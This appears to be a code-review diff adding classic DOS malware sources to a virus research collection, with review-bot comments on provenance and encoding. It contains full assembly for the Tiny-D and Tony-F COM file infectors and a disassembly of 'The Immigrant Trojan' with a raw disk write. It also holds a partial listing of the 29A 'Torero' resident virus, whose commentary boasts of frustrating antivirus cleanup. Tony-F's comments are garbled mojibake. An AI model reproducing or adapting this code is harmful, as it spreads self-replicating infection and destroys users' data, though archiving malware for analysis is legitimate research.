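Review bot: This listing carries no header at all — no sample name, no disassembler/author attribution, no date — unlike the TINY-167 and TINY-198 listings in this commit, which open with a provenance block. For a research corpus the provenance is the most important documentation a listing can have, since it is what lets a reader tie the source to a known sample. Add a leading comment block in the same style as the Bontchev listings, stating at least the sample name, who produced the listing and when, and where it was obtained; use explicit `unknown` placeholders where the information is not available rather than omitting the header.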


@ -0,0 +1,116 @@
tinyv SEGMENT BYTE PUBLIC 'code'
ASSUME CS:tinyv
ASSUME SS:tinyv
ASSUME DS:tinyv
H00000 DB 0
H00001 DB 255 DUP(?)
program PROC FAR
ASSUME ES:tinyv
begin:
JMP pgstart ; start program
exlbl LABEL BYTE
db 0CDh, 20h, 7, 8, 9
pgstart:
CALL tinyvir
mnprg PROC NEAR
tinyvir:
POP SI ; get SI for storage
SUB SI,offset tinyvir ; reset SI to virus start
MOV BP,[SI+blnkdat] ; store SI in BP for return
ADD BP,offset exlbl ; Add to get original offset
LEA DX,[SI+fspec] ; get filespec (*.COM)
SUB CX,CX ; || (clear regs)
MOV AH,4EH ; || (find files)
mainloop: ; \||/
INT 21H ; ----\/----
JC hiccup ; no more files found, terminate virus
MOV DX,009EH ; set file name pointer
MOV AX,3D02H ; open file
INT 21H ; do it!
MOV BX,AX ; move file handle to BX
MOV AH,3FH ; read file
LEA DX,[SI+endprog] ; load end of program (as buffer pntr)
MOV DI,DX ; set Dest Index to area for buffer (?)
MOV CX,0003H ; read 3 bytes
INT 21H ; do it!
CMP BYTE PTR [DI],0E9H ; check for JMP at start
JE infect ; If begins w/JMP, Infect
nextfile:
MOV AH,4FH ; set int 21 to find next file
JMP mainloop ; next file, do it!
hiccup: JMP nofile
infect:
MOV AX,5700h ; get date function
INT 21h ; do it!
PUSH DX ; store date + time
PUSH CX
MOV DX,[DI+01H] ; set # of bytes to move
MOV [SI+blnkdat],DX ; " " " " " "
SUB CX,CX ; " " " " " " (0 here)
MOV AX,4200H ; move file
INT 21H ; do it!
MOV DX,DI ; set dest index to area for buffer (?)
MOV CX,0002H ; two bytes
MOV AH,3FH ; read file
INT 21H ; do it!
CMP WORD PTR [DI],0807H ; check for infection
JE nextfile ; next file if infected
SUB DX,DX ; clear regs
SUB CX,CX ; " "
MOV AX,4202H ; move file pointer
INT 21H ; do it!
CMP DX,00H ; new pointer location 0?
JNE nextfile ; if no then next file
CMP AH,0FEH ; new pointer loc too high?
JNC nextfile ; yes, try again
MOV [SI+offset endprog+3],AX; point to data
MOV AH,40H ; write instruction
LEA DX,[SI+0105H] ; write buffer loc |
MOV CX,offset endprog-105h ; (size of virus) --\|/--
INT 21H ; do it!
JC exit ; error, bug out
MOV AX,4200H ; move pointer
SUB CX,CX ; clear reg
MOV DX,OFFSET H00001 ; where to set pointer
INT 21H ; do it!
MOV AH,40H ; write to file
LEA DX,[SI+offset endprog+3]; write data at SI+1AB
MOV CX,0002H ; two bytes (the JMP)
INT 21H ; do it!
MOV AX,5701h ; store date
POP CX ; restore time
POP DX ; restore date
INT 21h ; do it!
exit:
MOV AH,2Ah ; date function
INT 21h ; do it!
CMP AL,0h ; is it sunday?
JNE closal ; nope, quit
CMP DH,6h ; is it June?
JNE closal ; nope, quit
PUSH BX
PUSH SI
MOV AH,9h ; print string
MOV DX, OFFSET nondata ; string to print
ADD DX,SI
INT 21h ; print it
MOV DX, OFFSET nondat2 ; next string
ADD DX, SI
INT 21h ; print it!
POP BX
closal: MOV AH,3EH ; close file
INT 21H ; do it!
nofile: JMP BP ; go to original file
mnprg ENDP
program ENDP
blnkdat LABEL WORD
DW 0000H
fspec LABEL WORD
DB '*.COM'
DB 0
nondata DB 'Tiny-D version 1.1$ '; Program identification
nondat2 DB ' by ˜€×@&î·³½ë$' ; author identification
endprog LABEL WORD
tinyv ENDS
END program

@ -0,0 +1,310 @@
ÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍ>>> Article From Evolution #1 - YAM '92
Article Title: The Immigrant Trojan Disassembly
Author: Natas Kaupas
;*****************************************************************************
; Dissasembly of The Immigrant Trojan (TIT)
; Dissasembly by Dark Angel
;
; Just save this and compile it with TASM.
;*****************************************************************************
PAGE 59,132
data_6e equ 2000h ; (0010:2000=89h)
data_8e equ 0Ch ; (8096:000C=0)
data_10e equ 87F8h ; (8096:87F8=0)
data_11e equ 0CDF3h ; (8096:CDF3=0)
; Tasm 1.00 will output an extra NOP (90h) on forward memory references
; if the segment is declared after the reference. Segments are declared
; prior to any code to allow re-assembly.
seg_B segment byte public
seg_B ends
seg_C segment byte public
seg_C ends
;-------------------------------------------------------------- seg_a ----
seg_a segment byte public
assume cs:seg_a , ds:seg_a , ss:stack_seg_c
db 0FDh,0FFh, 00h,0FFh,0F8h, 0Eh
db 0B8h, 05h, 00h, 8Eh,0D8h,0BDh
db 01h, 00h,0BAh, 0Dh, 00h,0B4h
db 0FFh,0FFh
db 9
db 0CDh, 21h, 80h, 3Eh, 0Ch, 00h
db 1Ah, 7Dh, 19h,0B4h, 05h,0B5h
db 00h,0B6h, 00h,0E1h, 79h, 8Ah
db 16h,0F3h,0CDh, 13h,0BAh, 6Ah
db 0E6h,0FEh, 06h,0F8h, 87h,0F3h
db 0EBh,0E0h,0B0h, 02h
loc_2:
mov cx,2BCh
mov dx,0FFC9h
stc ; Set carry flag
mov ds,[di+63h]
mov bx,[di+37h]
int 26h ; Absolute disk write, drive al
mov dx,0E326h
mov ax,0F000h
dec word ptr [si-5]
add [bp+si],al
or ax,440Ah
db 65h, 63h, 6Fh, 64h, 69h, 6Eh
db 0FFh, 7Fh
db 'g system files $'
db 0F8h, 7Fh,0E7h
db 'Ya', 27h, ' been hit'
db 0F8h,0FFh,0F7h
db 'y The Immigr'
db 0E1h, 21h, 61h, 6Eh,0EFh, 54h
db 72h, 6Fh, 6Ah,0F8h, 20h,0CEh
db 0C3h,0C4h, 65h, 64h,0E2h, 6Fh
db 78h,0C3h
db 69h
locloop_3:
jmp bx ;*Register jump
db 'a. [C.S.A.]'
db 0BEh, 2Eh, 02h, 00h, 24h, 00h
db 0F0h
db 13 dup (0)
seg_a ends
;-------------------------------------------------------------- seg_b ----
seg_b segment byte public
assume cs:seg_b , ds:seg_b , ss:stack_seg_c
db 10h, 00h
data_13 dw 0
data_14 dw 100h
data_15 dw 0Ch
data_16 dw 0Ch
data_17 dw 12h
data_18 dw 15Ch
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;
; Program Entry Point
;
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
tit proc far
start:
push es
push cs
pop ds
mov cx,data_18 ; (80B2:000C=15Ch)
mov si,cx
dec si
mov di,si
mov bx,ds
add bx,data_17 ; (80B2:000A=12h)
mov es,bx
std ; Set direction flag
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
push bx
mov ax,2Bh
push ax
retf
mov bp,cs:data_16 ; (80B2:0008=0Ch)
mov dx,ds
loc_6:
mov ax,bp
cmp ax,1000h
jbe loc_7 ; Jump if below or =
mov ax,1000h
loc_7:
sub bp,ax
sub dx,ax
sub bx,ax
mov ds,dx
mov es,bx
mov cl,3
shl ax,cl ; Shift w/zeros fill
mov cx,ax
shl ax,1 ; Shift w/zeros fill
dec ax
dec ax
mov si,ax
mov di,ax
rep movsw ; Rep when cx >0 Mov [si] to es:[di]
or bp,bp ; Zero ?
jnz loc_6 ; Jump if not zero
cld ; Clear direction
mov es,dx
mov ds,bx
xor si,si ; Zero register
xor di,di ; Zero register
mov dx,10h
lodsw ; String [si] to ax
mov bp,ax
loc_8:
shr bp,1 ; Shift w/zeros fill
dec dx
jnz loc_9 ; Jump if not zero
lodsw ; String [si] to ax
mov bp,ax
mov dl,10h
loc_9:
jnc loc_10 ; Jump if carry=0
movsb ; Mov [si] to es:[di]
jmp short loc_8 ; (0069)
loc_10:
xor cx,cx ; Zero register
shr bp,1 ; Shift w/zeros fill
dec dx
jnz loc_11 ; Jump if not zero
lodsw ; String [si] to ax
mov bp,ax
mov dl,10h
loc_11:
jc loc_14 ; Jump if carry Set
shr bp,1 ; Shift w/zeros fill
dec dx
jnz loc_12 ; Jump if not zero
lodsw ; String [si] to ax
mov bp,ax
mov dl,10h
loc_12:
rcl cx,1 ; Rotate thru carry
shr bp,1 ; Shift w/zeros fill
dec dx
jnz loc_13 ; Jump if not zero
lodsw ; String [si] to ax
mov bp,ax
mov dl,10h
loc_13:
rcl cx,1 ; Rotate thru carry
inc cx
inc cx
lodsb ; String [si] to al
mov bh,0FFh
mov bl,al
jmp locloop_15 ; (00BB)
loc_14:
lodsw ; String [si] to ax
mov bx,ax
mov cl,3
shr bh,cl ; Shift w/zeros fill
or bh,0E0h
and ah,7
jz loc_16 ; Jump if zero
mov cl,ah
inc cx
inc cx
locloop_15:
mov al,es:[bx+di]
stosb ; Store al to es:[di]
loop locloop_15 ; Loop if cx > 0
jmp short loc_8 ; (0069)
loc_16:
lodsb ; String [si] to al
or al,al ; Zero ?
jz loc_18 ; Jump if zero
cmp al,1
je loc_17 ; Jump if equal
mov cl,al
inc cx
jmp short locloop_15 ; (00BB)
loc_17:
mov bx,di
and di,0Fh
add di,data_6e ; (0010:2000=89h)
mov cl,4
shr bx,cl ; Shift w/zeros fill
mov ax,es
add ax,bx
sub ax,200h
mov es,ax
mov bx,si
and si,0Fh
shr bx,cl ; Shift w/zeros fill
mov ax,ds
add ax,bx
mov ds,ax
jmp loc_8 ; (0069)
db 41h, 43h, 2Dh, 44h, 43h
loc_18:
push cs
pop ds
mov si,offset data_19 ; (80B2:0158=11h)
pop bx
add bx,10h
mov dx,bx
xor di,di ; Zero register
loc_19:
lodsb ; String [si] to al
or al,al ; Zero ?
jz loc_21 ; Jump if zero
mov ah,0
loc_20:
add di,ax
mov ax,di
and di,0Fh
mov cl,4
shr ax,cl ; Shift w/zeros fill
add dx,ax
mov es,dx
add es:[di],bx
jmp short loc_19 ; (0109)
loc_21:
lodsw ; String [si] to ax
or ax,ax ; Zero ?
jnz loc_22 ; Jump if not zero
add dx,0FFFh
mov es,dx
jmp short loc_19 ; (0109)
loc_22:
cmp ax,1
jne loc_20 ; Jump if not equal
mov ax,bx
mov di,data_14 ; (80B2:0004=100h)
mov si,data_15 ; (80B2:0006=0Ch)
add si,ax
add data_13,ax ; (80B2:0002=0)
sub ax,10h
mov ds,ax
mov es,ax
xor bx,bx ; Zero register
cli ; Disable interrupts
mov ss,si
mov sp,di
sti ; Enable interrupts
jmp dword ptr cs:[bx] ;*
data_19 db 11h
db 0, 1, 0
db 292 dup (0)
tit endp
seg_b ends
;--------------------------------------------------------- stack_seg_c ---
stack_seg_c segment word stack 'STACK'
db 128 dup (0)
stack_seg_c ends
end start



@ -0,0 +1,201 @@
;------------------------------------------------------------------------------;
; ;
; ‚¨°³± Tony-F ;
; ;
; Tony_F ¥ ¯ ° §¨²¥­ ¢¨°³±,¤¥©±²¢¨¥²® ¬³ ±¥ ±º±²®© ¢ ±«¥¤­®²® - ¯°¨ ±² °²¨° ­¥;
; ­  § ° §¥­ ´ ©« ¢¨°³±º² ¯°¥²º°±¢  ¶¿« ²  ²¥ª³¹  ¤¨°¥ª²®°¨¿ ¨ § ° §¿¢  ¢±¨·ª¨ ;
; ´ ©«®¢¥ ®²£®¢ °¿¹¨ ­  ?*.COM, ª ²® ? § ¢¨±¨ ®² ¤ ² ² . ;
; Tony-F ±¥ ­ ±² ­¿¢  ¯°¥¤¨ ª®¤  ­  § ° §¥­¨¿ ´ ©«, ¢¨°³±º² ®°£ ­¨§¨°  ;
; ±®¡±²¢¥­  ¯°®¶¥¤³°  §  ®¡° ¡®²ª  ­  ª°¨²¨·­¨ £°¥¸ª¨ (¢¥ª²®° 24h) ¨ ­¥ ¯°®¬¥­¿;
; ¤ ² ²  ¨ · ±  ­  § °¿§ ­¨²¥ ´ ©«®¢¥. ;
; Tony-F ­ ¬¨°  ®°¨£¨­ «­¨¿  ¤°¥± ­  ¢¥ª²®° 21h ¨ £® ¯®±² ¢¿ ¢ ² ¡«¨¶ ²  ­  ;
; ¯°¥ªº±¢ ­¨¿²  ª ²® ¢¥ª²®° 3, ² §¨ ®¯¥° ¶¨¿ ¯°¥·¨ ­  ¥¢¥­²³ «­® ²° ±¨° ­¥ ­  ;
; ¢¨°³±  ± ¤¥¡³£¥°. ;
;------------------------------------------------------------------------------;
;  ±¥¬¡«¨° ©²¥ ± Turbo Assembler 2.0+
.model Tiny
.code
VirLen = offset EndCode - offset Start ; „º«¦¨­  ­  ¢¨°³± .
;-----------------------------------------------------------------------------;
Org 07Fh
INT24 db ? ; ’³ª ¹¥ ¡º¤¥ ­ ±®·¥­ ¢¥ª²®° 24h.
Org 0100h
NewDTA db 15h dup (?) ; ‘²°³ª²³°  ­  DTA.
FAttr db ?
FTime dw ?
FDate dw ?
FLen dw ?, ?
FName db 0Dh dup (?)
;-----------------------------------------------------------------------------;
Org 100h
Start:
push ax ; ‡ ¯ §¢  ±º¤º°¦ ­¨¥²® ­  AX.
;...... ’³ª § ¯®·¢  ²º°±¥­¥²® ­  ®°¨£¨­ «­¨¿ ¢¥ª²®° 21h ¢ ±¥£¬¥­²  ­  „Ž‘
mov ax,1203h
int 2Fh ; <20>°®·¨²  ±¥ ±¥£¬¥­²  ­  „Ž‘.
xor si,si ; Ž°¨£¨­ «­¨¿ ¢¥ª²®° ±¥ ²º°±¨ ¯® ¯º°¢¨²¥
Again: ; ²°¨ ¡ ©²  - 2…h,3€h ¨ 26h.
lodsw
cmp ax,3A2Eh
je NextByte
dec si
jnz Again
jmp Done
NextByte:
lodsb
cmp al,26h
jne Again
Found:
sub si,03
mov dx,si
mov ax,2503H ; ¢¥ª²®° 21h ±¥ ¯®±² ¢¿ ­  ¬¿±²®²® ­ 
Int 21h ; ¢¥ª²®° 3.
push cs ; ¢º§±² ­®¢¿¢  ±¥ ±²®©­®±²²  ­  DS.
pop ds
;...... <20>°¥­ ±®·¢ ­¥ ­  ¢¥ª²®°  §  ª°¨²¨·­¨ £°¥¸ª¨
mov INT24,0CFh ; ‘º§¤ ¢  ­®¢ ¢¥ª²®° 24h - Iret
mov ax,2524h
mov dx,offset INT24
Int 3 ; <20>°¥­ ±®·¢  ¢¥ª²®°  24h.
mov ax,cs
add ah,10h
mov es,ax ; ES = CS + 64 KBytes
mov si,offset Start
xor di,di
mov cx,si ; <20>°¥µ¢º°«¿ ª®¤  ­  ¢¨°³±  64KBytes
rep movsb ; ¯®-­ £®°¥ ¢ ¯ ¬¥²² .
mov dx,offset NewDTA ; <20>®±² ¢¿ DTA ­  ­®¢  ¤°¥±.
mov ah,1Ah
Int 3
mov ah,2Ah
Int 3 ; ˆ±ª  ®² „Ž‘ ¤ ² ² ,
add dl,'A' ; ¨ ®² ­¥¿ ±¥ ¯®«³· ¢  ¯º°¢ ²  ¡³ª¢ 
mov AllCom ,dl ; ­  ´ ©«®¢¥²¥ §  § ° §¿¢ ­¥.
;...... ‡ ¯®·¢  ²º°±¥­¥ ­  ´ ©«®¢¥ §  § ° §¿¢ ­¥.
mov dx, offset AllCom ; ’º°±¨ ¢±¨·ª¨ '?*.COM' ´ ©«®¢¥.
mov cl,110B
mov ah,4Eh ; ˆ§¢¨ª¢  Find First.
Int 3
jc Done ; <20>°®¤º«¦ ¢  ­ ² ²ºª ¯°¨ «¨¯±  ­ 
; ´ ©«®¢¥ §  § ° §¿¢ ­¥.
FindNext:
mov dx,offset Fname ; dx  ¤°¥±  ­  ¨¬¥²® ­  ´ ©«  ®² DTA.
mov ax,3D02h ; Ž²¢ °¿ ´ ©«  §  § ¯¨±/·¥²¥­¥.
Int 3
mov bx,ax ; ‡ ¯ §¢  ­®¬¥°  ­  ®²¢®°¥­¨¿ ´ ©«.
push ds ; ‡ ¯ §¢  DS.
push es
pop ds ; DS = CS + 64 KBytes.
mov dx,VirLen ; DX = ¤º«¦¨­ ²  ­  ¢¨°³±  .
mov cx,-1 ; <20>°®·¨²  ±¥ ¶¥«¨¿ ´ ©« ­   ¤°¥± - DS:DX .
mov ah,3Fh ; ’ ¬ ±¥ ­ ¬¨°  ¢¨°³± ,  ±¥£  ±«¥¤ ­¥£®
Int 3 ; ¨ ´ ©«º².
; “¢¥«¨· ¢  ¤º«¦¨­ ²  ­  ´ ©« (AX) ±
add ax,Virlen ; ¤º«¦¨­ ²  ­  ¢¨°³± .
jc Close ; <20>°¨ ¯°¥¯º«¢ ­¥ ´ ©«º² ­¥ ±¥ § ° §¿¢ .
cmp Byte ptr ds:[ Mark + VirLen -100h ],'T' ; „ «¨ ´ ©«º² ¥ § ° §¥­ ¢¥·¥ ?
je Close
push ax ; ‡ ¯ §¢  ¤º«¦¨­ ²  ­  ´ ©«  ¢ ±²¥ª .
xor cx,cx
xor dx,dx
mov ax,4200h ; <20>°¥¬¥±²¢  ±¥ ³ª § ²¥«¿ ­  ´ ©« (CX:DX)
Int 3 ; ¢ ­ · «®²® ¬³.
pop cx ; <20>°®·¨²  ¤º«¦¨­ ²  ­  ´ ©«  ®² ±²¥ª .
; DX ¥ ° ¢­® ­  0 ®² Fn 42.
mov ah,40h ; Ž²  ¤°¥±  DS:DX ±¥ § ¯¨±¢  ­  ¤¨±ª 
Int 3 ; ¢¨°³± + ´ ©«.
mov cx,cs:FTime
mov dx,cs:FDate ; ‚º§±² ­®¢¿¢ ² ±¥ ¤ ² ²  ¨ ¢°¥¬¥²® ­ 
mov ax,5701h ; § ° §¿¢ ­¨¿ ´ ©« ®² DTA.
Int 3
Close:
pop ds ; ‚º§±² ­®¢¿¢  DS.
mov ah,3Eh ; ‡ ²¢ °¿ ´ ©« .
Int 3
mov ah,4Fh
Int 3 ; ˆ§¢¨ª¢  Find Next,
jnc FindNext ;  ª® ¨¬  ®¹¥ ´ ©«®¢¥ ¢±¨·ª® ±¥ ¯®¢² °¿
; ¨ §  ²¿µ.
;....... <20> · «® ­  ±² °²¨° ­¥ ­  ¯°®£° ¬ ²  ªº¬ ª®¿²® ¥ § ª ·¥­ ¢¨°³± .
Done:
mov dx,80h
mov ah,1Ah
Int 3 ; ‚º§±² ­®¢¿¢  ±¥ ±² °¨¿  ¤°¥± ­  DTA.
push es
mov ax,offset TransF -100h ; <20>°¥¤ ¢  ³¯° ¢«¥­¨¥²® ­  ¢¨°³± 
push ax ; ª®©²® ¥ 64 KBytes ¯®-­ £®°¥
RETF ; ®² ¥²¨ª¥² TransF.
;........................................
; Œ °ª¨°®¢ª  §  ° §¯®§­ ¢ ­¥ ­  § ° §¥­¨
Mark db 'Tony' ; ´ ©«®¢¥.
AllCom db '+' ;
db '*.COM',0 ; Œ ±ª  §  ²º°±¥­¥ ­  ¢±¨·ª¨ ´ ©«®¢¥
;.......................................; §  § ° §¿¢ ­¥.
TRansF:
push ds
pop es
pop ax ; ‚º§±² ­®¢¿¢  ±º¤º°¦ ­¨¥²® ­  AX.
mov si,offset EndCode ; ‘¬ºª¢  ª®¤  ­  ¯°®£° ¬ ²  § ¯®·¢ ¹
mov di,offset Start ; ­¥¯®±°¥¤±²¢¥­® ±«¥¤ ¢¨°³±  ± 100h ¡ ©²  ­ ¤®«³.
push ds ; <20>®¤£®²¢¿  ¤°¥±  ¢ ±²¥ª  §  ¯°¥µ®¤ 
push di ; ªº¬ ­ · «®²® ­  ®°¨£¨­ «­ ²  ¯°®£° ¬ .
mov cx,0FFF0h -102h -Virlen
rep movsb
RETF
;-----------------------------------------------------------------------------;
EndCode:
Ret ; Ž² ²³ª § ¯®·¢  § ° §¥­ ²  ¯°®£° ¬ 
;-----------------------------------------------------------------------------;
End Start
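Review bot: Nearly every comment in this file is unreadable mojibake, from the header block after `; Tony-F` through the inline comments following `Start:`, so the only intelligible documentation left is the handful of English fragments such as 'Find First' and 'Find Next'. The byte pattern (e.g. the repeated `¢¨°³±` run) is consistent with Cyrillic text in the Bulgarian MIK OEM code page that was later decoded as Latin-1, though the exact code page should be confirmed. I'd add a header line `; NOTE: comments are Cyrillic in a DOS OEM code page (appears to be MIK -- confirm); view with that code page or transcode to UTF-8` so readers know the text is recoverable rather than corrupt, or transcode the file to UTF-8 at upload time while leaving the code bytes untouched.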


@ -0,0 +1,570 @@
;
; ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
; Torero ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
; by Mister Sandman/29A ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
; ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
; ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ
;
; Hoho... here you have a new coolio viral technique, especially dedicated
; to those who think that everything on viruses was invented yet :) This
; virus ain't a 'powerful' one; in fact, and as i decided to do in this
; first issue as i hadn't many time, it's a simple infector just written
; to show this new viral capability, never used before as far as i know.
;
; And what is this technique about?, you might ask. Ok... apart from DirII
; and all its family, we don't know many viruses that store the original
; header of infected files in other place than the viral code, right?
;
; AVV and i were making some researches and suddenly found ten free unused
; bytes on the directory entry of each file... and this the place where my
; virus stores the header of every file it infects :) In this way, the AV
; companies must write some specific routines for disinfecting Torero...
; this means that the cleaning of our virus is more difficult, which is
; what we're looking for :)
;
; Anyway, as every viral technique, it has some pros and some cons... and
; the cons consist on the next simple thingy: if someone copies, compress-
; es, or manipulates an infected file, it will have a different directory
; entry, and then it will be imposible to restore its original header.
;
; However, and as this is just a sample virus, i didn't pay much attention
; to this kinda probabilities, and i just used an idea Wintermute gave me:
; if the host doesn't find its original header, it will display a message
; i'm sure you all know: 'This program requires Microsoft Windows.' :)
;
; As a last (but not least) feature in this virus, don't forget to have a
; look at the infection mark, based on using the eigth attribute bit, al-
; ways empty and unused until now. This is a specially good infection mark
; for a virus, as it's very simple and doesn't get flagged because of in-
; correct time stamp and all that shit. Besides, it makes things easier
; for us when implementing stealth techniques, etc.
;
; About the name, i decided to call it 'Torero' because it's a spanish
; word which means 'bullfighter', often used for telling someone that he
; or what he did is cool, because toreros are supposed to have the biggest
; nuts around :)
;
; Compiling instructions
;
; tasm /m torero.asm
; tlink torero.obj
; exe2bin torero.exe torero.com
.286
torero segment byte public
assume cs:torero,ds:torero
org 0
torero_start label byte
torero_size equ torero_end-torero_start
torero_entry: call delta_offset ; Get ë-offset in BP
delta_offset: pop bp ; for l8r use
sub bp,offset delta_offset
mov ah,30h ; Get DOS version
int 21h
cmp bx,';)' ; Are we already
jne set_int_21h ; memory resident?
push cs ; Save CS for the host
mov bx,ds ; Don't lose DS
xor ax,ax ; Jump to the memory
mov ds,ax ; copy and restore
push word ptr ds:[21h*4+2] ; the host header
push offset check_host
mov ds,bx
retf
set_int_21h: mov ax,es
dec ax
mov ds,ax ; Program's MCB segment
xor di,di
cmp byte ptr ds:[di],'Y' ; Is it a Z block?
jna set_int_21h
sub word ptr ds:[di+3],((torero_size/10h)+2)
sub word ptr ds:[di+12h],((torero_size/10h)+2)
add ax,word ptr ds:[di+3]
inc ax
mov ds,ax
mov byte ptr ds:[di],'Z' ; Mark block as Z
mov word ptr ds:[di+1],8 ; System memory
mov word ptr ds:[di+3],((torero_size/10h)+1)
mov word ptr ds:[di+8],4f44h ; Mark block as owned
mov word ptr ds:[di+0ah],0053h ; by DOS (444f53h,0)
inc ax
cld
push cs
pop ds
mov es,ax
mov cx,torero_size ; Copy virus to memory
mov si,bp
rep movsb
push es
push offset copy_vector ; Jump to the virus
retf ; copy in memory
copy_vector: push ds
mov ds,cx
mov es,ax ; Save int 21h's
mov si,21h*4 ; original vector
lea di,old_int_21h
movsw
movsw
mov word ptr [si-4],offset new_int_21h
mov word ptr [si-2],ax ; Set ours
mov si,13h*4 ; Save int 13h's
lea di,old_int_13h ; original vector
movsw
movsw
mov word ptr [si-4],offset new_int_13h
mov word ptr [si-2],ax ; Set ours
mov ds,ax
check_host: call open_host ; Open the host
call get_sft ; Get its SFT for our
call check_mark ; infection mark
jb messed_up ; File is messed up :-(
call read_entry ; Read the entry
call point_entry ; Point to the header
cmp word ptr ds:[si],0 ; Is it empty?
jne restore_header
cmp word ptr ds:[si+2],0 ; Empty too? huh :-(
je messed_up ; File is messed up
restore_header: pop es ; ES=host segment
push es ; Store it in the stack
mov di,100h ; file header from the
push di ; Store the IP
movsw ; DS:SI points to the
movsb ; original header, in
; the directory entry
push es
pop ds ; DS=ES
retf ; Jump to the host
messed_up: mov ah,3eh ; File is messed up...
int 21h ; close it and show
call emergency ; the Windows message :)
; ÄÄ´ Torero's int 13h handler ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
new_int_13h: cmp ah,3
je sector_write ; Sector write?
db 0eah ; Jump back to the
old_int_13h dw ?,? ; original int 13h
sector_write: push ax bx cx
pushf
xor ah,ah ; Calculate how many
mov cl,4 ; files we must test
shl ax,cl ; by multiplying the
mov cx,ax ; sector number with
or cx,cx ; 10h (entries)
je bucle_end
int_13h_bucle: cmp byte ptr es:[bx+9],'O' ; -O-?
jne more_files
mov al,byte ptr es:[bx+9]
sub al,2
cmp al,byte ptr es:[bx+0ah] ; -OM?
jne more_files
cmp al,'M' ; Then it's a COM
je subtract
more_files: add bx,20h ; Look for more files
loop int_13h_bucle ; Look'n'loop :)
bucle_end: popf
pop cx bx ax ; End of the bucle
; Call the original
call int_13h ; int 13h and jump
xor_and_jump: xor ax,ax ; to the original int
return_to_int: push bp ax
pushf
pop ax ; Return to the
mov bp,sp ; original int 13h
mov word ptr ss:[bp+8],ax
pop ax bp
retf 2
subtract: cmp byte ptr es:[bx],0e5h ; A deleted file...
je more_files ; bah, skip it
cmp byte ptr es:[bx+0bh],80h ; Infected?
jb more_files
cmp word ptr es:[bx+0ch],0 ; Is the header field
jne more_files ; empty?
cmp word ptr es:[bx+0eh],0
jne more_files
mov ax,word ptr cs:[header_store] ; Ok, let's copy
mov word ptr es:[bx+0ch],ax ; the original file
; header to the
mov ax,word ptr cs:[header_store+2] ; directory entry
mov word ptr es:[bx+0eh],ax
jmp more_files
; ÄÄ´ Torero's signature ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
signature db 0dh,0ah,'[Torero €:-) by Mister Sandman/29A]',0dh,0ah
; ÄÄ´ Torero's int 21h handler ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
new_int_21h: cli
cmp ah,6ch ; This code is stolen
ja real_checks ; from the original
; DOS kernel handler,
cmp ah,33h ; so they won't catch
jb real_checks ; us if they don't go
jz fake_stuff ; further thru the
; rest of the code of
cmp ah,64h ; the handler... thanx
ja fake_stuff ; to Qark for this
jz real_checks ; cool idea :)
cmp ah,51h
jz real_checks
cmp ah,62h
jz fake_stuff
cmp ah,50h
jz real_checks
fake_stuff: push ax bx cx ; Shit, shit, shit,
nop ; shit... skip it
pop cx bx ax
real_checks: cmp ah,30h
jne opening ; (get DOS version)?
mov bx,';)' ; Return the smiley :)
iret
opening: cmp ah,3dh ; File opening?
je file_open
cmp ax,4301h ; Attribute change?
je new_attribute
cmp ax,6c00h ; Extended open?
je file_open
jmp_int_21h db 0eah ; Jump to the original
old_int_21h dw ?,? ; int 21h address
; ÄÄ´ File open ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
file_open: call infect_file ; Infection routine
jmp dword ptr cs:[old_int_21h] ; Jump back to int 21h
; ÄÄ´ New attribute ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
new_attribute: mov ah,30h ; Change 43h for 30h
iret ; so it will do nothing
; ÄÄ´ Infection routine ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
infect_file: pushf
push ax bx cx dx ; Push registers, flags
push si di ds es ; and all that shit
call set_int_24h ; Set int 24h
cmp ah,6ch ; Extended open?
jne normal_open
mov dx,si ; Fix it to DS:DX
normal_open: mov ax,3d00h ; Open the file
call int_21h
xchg bx,ax ; File handle in BX
push cs ; CS=DS
pop ds
call get_sft ; Get file's SFT
call check_mark ; Already infected?
jae close_and_pop
mov byte ptr es:[di+2],2 ; Open mode=r/w
mov ax,word ptr es:[di+28h] ; Check the extension
cmp ax,'OC' ; of our victim
jne close_and_pop
mov byte ptr cs:[infecting],1
mov ah,3fh ; Read the first three
mov cx,3 ; bytes to our temporal
lea dx,header_store ; header store
call int_21h
mov ax,word ptr es:[di+11h] ; File lenght in AX
cmp ax,0ea60h ; Too big file?
ja close_and_pop
push ax ; Lseek to the end of
